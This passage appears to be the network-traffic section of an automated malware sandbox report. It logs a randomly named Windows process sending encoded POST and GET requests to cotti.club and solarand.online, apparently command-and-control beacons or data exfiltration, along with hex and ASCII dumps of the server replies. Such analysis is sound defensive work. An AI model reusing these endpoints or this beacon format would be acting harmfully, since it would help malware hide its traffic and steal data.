                                                                                                                                                                              Data Ascii: ZT=LdQH5CP2FleS0QX4wXN7UeKZRJkIAiVuxqdqlfWBvfIxAA9AypESMhwXrWD6d5mgoypOb3kbGZuTUG5MM7CtBhBGII+kh0WK+bxcA0LDr/hpCBIYAVAstAh8GfgNcxEVzDtd9aEr99a81hDStytZ1g8z5DUZnw4Ao2QvP9rLJXqk2dozQLggAWIS646sxlL/Sw==


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              2192.168.2.449810103.120.80.111803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:10:51.605058908 CET724OUTPOST /3ej6/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.cotti.club
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.cotti.club
                                                                                                                                                                              Referer: http://www.cotti.club/3ej6/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 5a 54 3d 4c 64 51 48 35 43 50 32 46 6c 65 53 30 77 6e 34 79 77 5a 37 53 2b 4b 65 64 70 6b 49 4c 43 56 71 78 71 52 71 6c 65 43 72 76 71 34 78 41 68 4e 41 78 74 77 53 42 42 77 58 6a 32 44 37 58 5a 6e 73 6f 79 6c 77 62 79 6b 62 47 61 53 54 55 48 4a 4d 4d 6f 61 75 42 78 42 45 48 6f 2b 69 76 55 57 4b 2b 62 78 63 41 31 76 39 72 2f 4a 70 43 52 59 59 50 58 6b 6a 7a 51 68 2f 50 2f 67 4e 57 52 45 52 7a 44 73 2b 39 62 49 52 39 2b 69 38 31 6b 76 53 73 6a 74 59 38 67 38 31 33 6a 56 79 67 7a 6c 30 6d 45 73 69 53 64 37 79 4c 6b 79 33 36 37 6c 70 42 36 42 33 53 57 73 68 6e 2f 7a 59 38 6d 32 32 4a 34 38 55 45 72 4b 76 57 38 67 56 72 52 56 77 36 46 53 48 63 34 77 3d
                                                                                                                                                                              Data Ascii: ZT=LdQH5CP2FleS0wn4ywZ7S+KedpkILCVqxqRqleCrvq4xAhNAxtwSBBwXj2D7XZnsoylwbykbGaSTUHJMMoauBxBEHo+ivUWK+bxcA1v9r/JpCRYYPXkjzQh/P/gNWRERzDs+9bIR9+i81kvSsjtY8g813jVygzl0mEsiSd7yLky367lpB6B3SWshn/zY8m22J48UErKvW8gVrRVw6FSHc4w=


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              3192.168.2.449826103.120.80.111803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:10:54.154606104 CET10806OUTPOST /3ej6/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.cotti.club
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.cotti.club
                                                                                                                                                                              Referer: http://www.cotti.club/3ej6/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 5a 54 3d 4c 64 51 48 35 43 50 32 46 6c 65 53 30 77 6e 34 79 77 5a 37 53 2b 4b 65 64 70 6b 49 4c 43 56 71 78 71 52 71 6c 65 43 72 76 72 73 78 41 54 31 41 79 4b 73 53 41 42 77 58 70 57 44 32 58 5a 6d 32 6f 32 4a 4b 62 79 68 35 47 66 65 54 56 6c 42 4d 59 4a 61 75 53 52 42 45 46 6f 2b 6e 68 30 57 6c 2b 62 68 51 41 30 66 39 72 2f 4a 70 43 58 63 59 47 6c 41 6a 78 51 68 38 47 66 67 42 63 78 45 70 7a 48 35 46 39 62 64 6d 39 50 43 38 32 46 44 53 71 51 46 59 67 77 38 33 36 44 56 71 67 7a 70 72 6d 45 68 54 53 65 6e 55 4c 69 4f 33 72 4d 30 73 57 35 52 79 51 46 55 2f 34 4e 58 6a 37 6b 71 41 47 4b 46 76 43 75 57 73 4a 4f 63 36 6d 77 49 36 75 47 65 57 43 59 50 4b 6d 64 5a 6c 57 43 58 64 52 33 59 7a 4c 53 71 4e 4f 78 6b 35 53 35 51 70 63 79 74 6d 2b 42 38 35 4f 4b 37 4a 71 36 74 70 64 42 30 56 46 34 79 36 54 36 72 4e 61 77 59 38 6a 48 4e 6e 4e 6b 6f 70 71 56 2b 34 4f 45 52 56 70 6c 77 43 70 4f 73 57 36 79 49 50 57 36 5a 2b 6e 55 39 30 64 66 41 6c 64 35 77 79 67 64 72 4c 47 53 2b 56 4c 48 66 43 2b 45 72 67 55 4e 46 [TRUNCATED]
                                                                                                                                                                              Data Ascii: ZT=LdQH5CP2FleS0wn4ywZ7S+KedpkILCVqxqRqleCrvrsxAT1AyKsSABwXpWD2XZm2o2JKbyh5GfeTVlBMYJauSRBEFo+nh0Wl+bhQA0f9r/JpCXcYGlAjxQh8GfgBcxEpzH5F9bdm9PC82FDSqQFYgw836DVqgzprmEhTSenULiO3rM0sW5RyQFU/4NXj7kqAGKFvCuWsJOc6mwI6uGeWCYPKmdZlWCXdR3YzLSqNOxk5S5Qpcytm+B85OK7Jq6tpdB0VF4y6T6rNawY8jHNnNkopqV+4OERVplwCpOsW6yIPW6Z+nU90dfAld5wygdrLGS+VLHfC+ErgUNFdl9HXdumkWAUdRCgvkWMMZddPgmEv5yJhcpPZauXLm3Sh3FpDmtrh6Z7/uoSQx0f4FABNNqfHML/3WQ4GykXUyUzdDH9TK+JiorjLYyT1JVOapkpb4XgVmALwf3qh2lxvUFCRCsuj6Qy65Mqi2AWswpdV3F0SNKsKvnxaog00qLxa1H+kpoT0To8qeCLpCZDSfJTbLiv0P85Xakd2/+iSF/Mxm8yjb3Mj31mCS2ef6lt8VRtKT/8pOiFNYQ7dfSRIM4TAQNL6PT1KL3W6OVnYv/cWmf40DbNY+xWb6IY5+jQXAwY5FctvcK5wXB6DEVKxbeEOf+PHAOQhzlmk2koes5TsfMxbYZHmcfET7cQYnnyxU9/0OUcaE5niBHfj0GwoS/cjW5T5sqPnyssH/hwfTyUzXnnH8UHe1t6Eo83b3koNLMSNmKsxTTploSllYvlt6RRo0YRww97krCYpJSIUaZscTtLC/8eI/ZDc7sDZo7SHGYgqkjbd35PC48m05o6b5CQ8ZqOclnp9HAQRlEbLbCFX684gSWQlBKwNO/TyO+MCeHxbCLi26quAPytR/CmYMHIOFbUO6FlxeYiDv2/atjhxdHnZNMdDuZLd3r7M2dlKUMILf9XWfUXAR3lhrv5bXIaYndeGLw2pUt5UGC/YaxbpOS0NapkJ3 [TRUNCATED]


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              4192.168.2.449840103.120.80.111803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:10:56.692476034 CET443OUTGET /3ej6/?ZT=Gf4n60vPMxeL0A+d5GBWdueSYaV7AAF6sYlT7O2otcMNGwtil4ITBlU9iT/EVO+vtwlhWFB1C/mfTw8URcWhMQgTObTwj1m/ib0JAzzbicsZX3cTLGstzzo=&mTkD=Gj2Ti2T0g4 HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.cotti.club
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Oct 30, 2024 08:10:57.668732882 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                              Server: wts/1.7.0
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:11:38 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              ETag: "65517fce-1a10"
                                                                                                                                                                              Data Raw: 31 61 31 61 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 63 6f 74 74 69 2e 63 6c 75 62 2d d5 fd d4 da ce f7 b2 bf ca fd c2 eb 28 77 77 77 2e 77 65 73 74 2e 63 6e 29 bd f8 d0 d0 bd bb d2 d7 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 63 6f 74 74 69 2e 63 6c 75 62 2c 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e [TRUNCATED]
                                                                                                                                                                              Data Ascii: 1a1a<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>cotti.club-(www.west.cn)</title> <meta name="description" content="cotti.club," /> <meta name="keywords" content="cotti.club," /> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <style> body { line-height: 1.6; background-color: #fff; } body, th, td, button, input, select, textarea { font-family: "Microsoft Yahei", "Hiragino Sans GB", "Helvetica Neue", Helvetica, tahoma, arial, Verdana, sans-serif, "WenQuanYi Micro Hei", "\5B8B\4F53"; font-size: 12px; color: #666; -webkit-font-smoothing: antialiased; -moz-font-smoothing: antialiased; } [TRUNCATED]
                                                                                                                                                                              Oct 30, 2024 08:10:57.668751001 CET1236INData Raw: 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2c 0d 0a 20 20 20 20 20 20 20 20 68 31
                                                                                                                                                                              Data Ascii: height: 100%; } html, body, h1, h2, h3, h4, h5, h6, hr, p, iframe, dl, dt, dd, ul,
                                                                                                                                                                              Oct 30, 2024 08:10:57.668764114 CET1236INData Raw: 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 30 70 78 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 2e 6f 72 61 6e 67 65 62 74 6e 3a 68 6f 76 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c
                                                                                                                                                                              Data Ascii: margin-top: 20px } .orangebtn:hover { color: #fff; background-color: #f16600; } .banner1 h1 { font-size: 48px; color: #feff07;
                                                                                                                                                                              Oct 30, 2024 08:10:57.668864012 CET636INData Raw: 69 7a 65 3a 20 32 34 70 78 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 2e 72 69 67 68 74 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32
                                                                                                                                                                              Data Ascii: ize: 24px } .right { background-color: #2780d9; height: 100%; width: 320px; position: absolute; right: 50px; top: 0; color:
                                                                                                                                                                              Oct 30, 2024 08:10:57.668876886 CET1236INData Raw: 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 35 30 70 78 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20
                                                                                                                                                                              Data Ascii: } .contact { margin-left: 50px } .contact p { line-height: 40px } a { text-decoration: none; } .t
                                                                                                                                                                              Oct 30, 2024 08:10:57.668939114 CET1236INData Raw: 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 2d 6c 69 6e 6b 22 20 69 64 3d 22 4a 5f 66 6f 6f 74 65 72 4c 69 6e 6b 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73
                                                                                                                                                                              Data Ascii: <div class="footer-link" id="J_footerLink"> <a href="https://www.west.cn/services/domain/" target="_blank"></a> <span>|</span> <a href="https://www.west.cn/jiaoyi/" target="_bla
                                                                                                                                                                              Oct 30, 2024 08:10:57.668945074 CET72INData Raw: 74 42 65 66 6f 72 65 28 68 6d 2c 20 73 29 3b 0d 0a 20 20 20 20 20 20 20 20 7d 29 28 29 3b 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: tBefore(hm, s); })(); </script></body></html>0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              5192.168.2.449876217.160.0.60803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:11:02.927584887 CET719OUTPOST /diem/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.solarand.online
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.solarand.online
                                                                                                                                                                              Referer: http://www.solarand.online/diem/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 5a 54 3d 33 6d 34 49 52 6b 38 6f 54 33 58 4c 48 71 45 36 66 72 52 62 31 2b 70 77 33 50 6e 44 32 41 79 31 68 62 77 52 54 38 50 56 74 4e 56 68 33 44 56 54 2f 33 51 4a 4b 67 78 6f 43 2b 53 4d 56 75 6d 35 69 6a 4d 54 48 4a 47 32 58 4b 47 7a 77 46 42 68 31 56 32 2f 4b 79 43 4f 41 67 53 72 53 59 6d 58 41 76 6d 53 49 70 6d 32 72 58 49 51 39 47 71 32 4d 31 6c 78 4b 6a 65 47 50 66 75 69 62 38 34 32 68 51 4d 79 2b 6b 56 68 70 33 6e 76 46 6c 36 51 4f 4c 79 58 4e 79 42 72 4e 46 2f 62 74 2b 6c 4d 54 61 75 47 70 4f 74 4c 47 68 79 77 56 79 32 75 34 44 6b 41 4e 43 79 62 30 61 62 6e 56 6a 39 5a 43 67 3d 3d
                                                                                                                                                                              Data Ascii: ZT=3m4IRk8oT3XLHqE6frRb1+pw3PnD2Ay1hbwRT8PVtNVh3DVT/3QJKgxoC+SMVum5ijMTHJG2XKGzwFBh1V2/KyCOAgSrSYmXAvmSIpm2rXIQ9Gq2M1lxKjeGPfuib842hQMy+kVhp3nvFl6QOLyXNyBrNF/bt+lMTauGpOtLGhywVy2u4DkANCyb0abnVj9ZCg==
                                                                                                                                                                              Oct 30, 2024 08:11:03.747900963 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:11:03 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                              Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED]
                                                                                                                                                                              Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
                                                                                                                                                                              Oct 30, 2024 08:11:03.747917891 CET899INData Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5
                                                                                                                                                                              Data Ascii: H|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              6192.168.2.449890217.160.0.60803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:11:05.476934910 CET739OUTPOST /diem/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.solarand.online
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.solarand.online
                                                                                                                                                                              Referer: http://www.solarand.online/diem/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 5a 54 3d 33 6d 34 49 52 6b 38 6f 54 33 58 4c 56 62 30 36 65 49 70 62 38 2b 70 7a 38 76 6e 44 68 51 79 78 68 62 38 52 54 34 57 51 74 37 4e 68 33 68 64 54 2b 30 49 4a 44 77 78 6f 4b 65 53 4e 4e 4f 6e 37 69 6a 42 75 48 4d 6d 32 58 4b 53 7a 77 41 39 68 30 69 43 67 59 79 44 6f 42 51 53 6c 50 49 6d 58 41 76 6d 53 49 71 62 2b 72 57 73 51 39 32 61 32 65 45 6c 32 41 44 65 4a 48 2f 75 69 66 38 34 79 68 51 4d 4d 2b 6d 68 66 70 79 6a 76 46 6b 4b 51 4c 4b 79 57 47 79 42 70 41 6c 2b 63 6b 50 4d 37 65 36 6a 46 6e 75 39 73 4f 51 61 75 64 55 37 30 70 79 46 58 66 43 57 6f 70 64 53 54 59 67 41 51 5a 6f 73 4a 4f 59 4d 55 70 6d 6a 6a 4f 78 66 6e 6e 33 6c 63 36 59 67 3d
                                                                                                                                                                              Data Ascii: ZT=3m4IRk8oT3XLVb06eIpb8+pz8vnDhQyxhb8RT4WQt7Nh3hdT+0IJDwxoKeSNNOn7ijBuHMm2XKSzwA9h0iCgYyDoBQSlPImXAvmSIqb+rWsQ92a2eEl2ADeJH/uif84yhQMM+mhfpyjvFkKQLKyWGyBpAl+ckPM7e6jFnu9sOQaudU70pyFXfCWopdSTYgAQZosJOYMUpmjjOxfnn3lc6Yg=
                                                                                                                                                                              Oct 30, 2024 08:11:06.297595978 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:11:06 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                              Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED]
                                                                                                                                                                              Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
                                                                                                                                                                              Oct 30, 2024 08:11:06.297638893 CET899INData Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5
                                                                                                                                                                              Data Ascii: H|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              7192.168.2.449904217.160.0.60803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:11:08.028850079 CET10821OUTPOST /diem/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.solarand.online
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.solarand.online
                                                                                                                                                                              Referer: http://www.solarand.online/diem/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
